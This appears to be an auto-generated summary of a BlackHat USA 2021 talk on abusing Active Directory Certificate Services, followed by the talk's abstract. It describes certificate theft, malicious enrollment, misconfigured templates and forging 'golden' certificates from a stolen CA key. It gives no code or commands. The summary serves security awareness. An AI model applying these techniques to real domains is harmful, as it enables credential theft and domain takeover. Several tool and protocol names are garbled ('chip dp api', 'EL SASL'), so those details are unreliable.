Certified Pre-Owned: Abusing Active Directory Certificate Services

Conference:  BlackHat USA 2021



Active Directory Certificate Services has a lot of abuse potential for domain persistence and credentials. The presentation focuses on stealing certificates, doing active enrollments, and domain escalation scenarios.
  • Active Directory Certificate Services has a lot of abuse potential
  • Stealing certificates and doing active enrollments are some of the domain escalation scenarios
  • Active enrollment for EL SASL is a particularly interesting area
  • Domain persistence is a huge area of tradecraft
  • A 140-page white paper with complete details and extensive defensive information is available
  • Tools such as Certify and Forge Cert will be released on GhostPack Github repo
  • Golden certificates can be used to obtain ntlm credentials for any active user or computer
  • The MS PKCA can be used to retrieve and associate a user or computer's ntlm hash
  • An anecdote is provided to illustrate how a forged certificate can be used to access the file system on the DC
The presentation provides an anecdote on how a forged certificate was used to access the file system on the DC. The presenter ran code on the CA server to steal the CA's private key using chip dp api. The extracted cert was then used to forge a certificate for the administrator at the shire.local. With the forged certificate, the presenter was able to access the DC's file system and obtain the administrator's ntlm credentials using some user to user stuff.


Microsoft's Active Directory Public Key Infrastructure (PKI) implementation, known as Active Directory Certificate Services (AD CS), has largely flown under the radar by both the offensive and defensive realms. AD CS is widely deployed and provides attackers opportunities for credential theft, machine persistence, domain escalation, and subtle domain persistence. We will present the relevant background on certificates in Active Directory, detail the abuse of AD CS through certificate theft and active malicious enrollments for user and machine persistence, discuss a set of common certificate template misconfigurations that can result in domain escalation, and explain a method for stealing a Certificate Authority's private key in order to forge new user/machine "golden" certificates. By bringing light to the security implications of AD CS, we hope to raise awareness for both attackers and defenders alike of the security issues surrounding this complex, widely deployed, and often misunderstood system.